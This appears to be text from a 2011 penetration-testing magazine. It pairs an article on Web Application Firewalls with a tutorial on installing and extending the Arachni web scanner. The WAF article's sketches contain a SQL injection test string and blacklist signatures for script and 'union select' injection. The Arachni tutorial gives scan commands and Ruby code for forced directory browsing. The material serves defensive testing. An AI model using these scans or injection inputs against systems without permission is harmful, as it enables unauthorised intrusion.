They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications – one which they often do not fulfill.

Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
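The Session Fixation point can be illustrated with a short sketch (illustrative Python, not taken from the article; the in-memory store and function names are hypothetical): regenerating the session identifier at login invalidates any ID an attacker planted beforehand.

```python
import secrets

# Hypothetical in-memory session store: session_id -> session data.
sessions = {}

def create_session():
    sid = secrets.token_hex(16)
    sessions[sid] = {"authenticated": False}
    return sid

def login(old_sid, user):
    """Issue a fresh session ID at login, so a fixated
    pre-login ID becomes worthless to the attacker."""
    data = sessions.pop(old_sid, {})          # invalidate the old ID
    data.update({"authenticated": True, "user": user})
    new_sid = secrets.token_hex(16)
    sessions[new_sid] = data
    return new_sid

pre_login = create_session()                  # ID an attacker may have planted
post_login = login(pre_login, "alice")
assert pre_login not in sessions              # old ID no longer valid
assert sessions[post_login]["authenticated"]
```

An application that derives authentication state from other attributes than the session ID cannot simply swap the ID like this, which is exactly the retrofitting problem described above.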
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more securely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.

A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.

Secure programming and WAFs are not contradictory but actually complement each other. Analogous to air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis; that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can also be checked in this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid number of characters and permitted value range.
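Such parameter rules can be sketched in a few lines. This is illustrative Python; the rule set, parameter names and function name are invented for the example and are not taken from any particular WAF product:

```python
import re

# Hypothetical rule set for one monitored entry form:
# expected parameter names, maximum length, permitted characters.
FORM_RULES = {
    "username": {"max_len": 32, "pattern": re.compile(r"^[A-Za-z0-9_.-]+$")},
    "lang":     {"max_len": 5,  "pattern": re.compile(r"^[a-z]{2}(-[A-Z]{2})?$")},
}

def check_request(params):
    """Return (allowed, reason), blocking unexpected, oversized
    or malformed parameters, as a WAF parameter rule might."""
    if len(params) > len(FORM_RULES):
        return False, "too many parameters"
    for name, value in params.items():
        rule = FORM_RULES.get(name)
        if rule is None:
            return False, "unexpected parameter: " + name
        if len(value) > rule["max_len"]:
            return False, "parameter too long: " + name
        if not rule["pattern"].match(value):
            return False, "invalid characters in: " + name
    return True, "ok"

print(check_request({"username": "alice", "lang": "en"}))         # allowed
print(check_request({"username": "a' OR '1'='1", "lang": "en"}))  # blocked
print(check_request({"username": "a", "lang": "en", "x": "1"}))   # blocked
```

The injection attempt in the second call is rejected not by a signature but simply because quotes and spaces fall outside the permitted character set – exactly the generic parameter quality rule described above.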
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule for request rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
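A request-rate rule of the kind that blunts brute-force attempts can be approximated with a sliding-window counter. This is an illustrative Python sketch under the assumption of a per-client-IP limit, not the implementation of any real WAF:

```python
import time
from collections import deque, defaultdict

class RateLimiter:
    """Hypothetical sliding-window limiter: at most `limit`
    requests per `window` seconds per client IP."""
    def __init__(self, limit=5, window=60.0):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)

    def allow(self, client_ip, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[client_ip]
        while q and now - q[0] > self.window:   # drop hits outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False                         # over the limit: block
        q.append(now)
        return True

rl = RateLimiter(limit=3, window=60.0)
results = [rl.allow("10.0.0.1", now=t) for t in (0, 1, 2, 3)]
print(results)  # [True, True, True, False]
```

A real appliance would add configurable responses (delay, CAPTCHA, block duration), but the core decision is this counter.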
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser, if for example a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever there are changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
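The combined approach can be sketched as follows (illustrative Python; the URLs are invented, and the two blacklist signatures are deliberately naive stand-ins for a real rule set):

```python
import re

# Hypothetical learned whitelist for a high-value sub-section,
# plus a generic blacklist of known-bad patterns.
WHITELIST = {"/order/new", "/order/submit"}           # learned URLs
BLACKLIST = [re.compile(p, re.I) for p in (
    r"<script",            # naive XSS signature
    r"union\s+select",     # naive SQL injection signature
)]

def decide(url, body):
    """Strict whitelist inside the protected sub-section,
    blacklist signatures everywhere."""
    if url.startswith("/order/") and url not in WHITELIST:
        return "block"                 # unknown URL in the strict zone
    for sig in BLACKLIST:
        if sig.search(body):
            return "block"             # known-bad pattern anywhere
    return "allow"

print(decide("/order/new", "qty=1"))                 # allow
print(decide("/order/evil", "qty=1"))                # block (not whitelisted)
print(decide("/blog/post", "x=<script>alert(1)"))    # block (blacklist hit)
print(decide("/blog/post", "hello"))                 # allow
```

The split mirrors the recommendation in the text: the order-entry zone only accepts what was learned, while the rest of the site is covered by the negative security profile.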
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain special functions are only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the overwriting of the web application's hidden URL with the URL used by public requests. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times for the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured to match the respective conditions. Penetration tests help with the correct configuration.

Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
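URL translation and cloaking of this kind boil down to rewriting internal names out of outgoing responses. A minimal sketch in Python, with invented host names, might look like this:

```python
import re

# Hypothetical mapping: internal backend addresses that must never
# appear in responses, and the public name to show instead.
INTERNAL_HOSTS = ["appsrv01.internal.example", "10.1.2.3"]
PUBLIC_HOST = "www.example.com"

def cloak_response(html):
    """Rewrite outgoing content so the real infrastructure
    stays hidden, as a reverse-proxy WAF might do."""
    for host in INTERNAL_HOSTS:
        html = re.sub(re.escape(host), PUBLIC_HOST, html)
    return html

page = '<a href="http://appsrv01.internal.example/admin">admin</a>'
print(cloak_response(page))
# '<a href="http://www.example.com/admin">admin</a>'
```

A production proxy would also rewrite Location headers, cookies and error pages; the point here is only the direction of the filtering – outbound, not inbound.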
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:

• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there a simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.

Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since by its very nature a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only granted those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for a safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively, are clearly displayed, and are easy to understand and to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.

In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP VULNERABILITIES
Page 24 | http://pentestmag.com | 01/2011 (1) November
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.

Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.

Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as providing a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.

This will install all source directories in your home directory. Change all the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.

Please note that these installation instructions start with the installation of Cygwin and all required dependencies.

Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually requires recompiling any tools that you compiled earlier.

Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally we can install Arachni (and the source) by executing the commands from Listing 2 in the Cygwin shell (note: these are the same commands as for the Linux installation).

In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:

$ find /usr/local -iname '*.so' > /tmp/localso.lst

Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.

The GUI can be started by executing the following commands:

$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface instead, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and more.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, and so on.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
                          <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute
  and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on
# wordlists generated from open
# source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-
# better-lists-for-forced-browsing
#
# The SVNDigger wordlists were released under the GPL
# v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " +
                    res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories,
                based on wordlists created from
                open source repositories. The
                wordlist utilized by this module
                will be vast and will add a consi-
                derable amount of
                time to the overall scan time.},
            :author      => 'Herman Stevens <hermanstevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these
                    resources manually. Check if
                    unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories, audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it real easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in the further scans) as well as create a report entry for it.
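Stripped of the Arachni plumbing, the check-and-log flow can be sketched in plain Ruby. This is a standalone illustration, not Arachni code: the probe block stands in for Arachni's log_remote_directory_if_exists, injected so the logic runs without any network access, and the function name is made up for the sketch.

```ruby
require 'set'

# Minimal forced-browsing sketch: try each wordlist entry under a base
# path and collect the ones the probe reports as existing. The audited
# set prevents re-scanning the same base path twice.
def forced_browse( base, wordlist, audited = Set.new, &probe )
  found = []
  return found if audited.include?( base )

  wordlist.each do |dirname|
    url = base + dirname + '/'
    found << url if probe.call( url )
  end

  audited << base
  found
end

# Hypothetical probe: pretend only /admin/ exists on the server.
hits = forced_browse( 'http://example.com/', %w[admin backup] ) do |url|
  url.end_with?( '/admin/' )
end
puts hits.inspect  # ["http://example.com/admin/"]
```

In the real module the probe is an HTTP request and a hit is also handed to the Trainer, but the control flow is the same.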
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
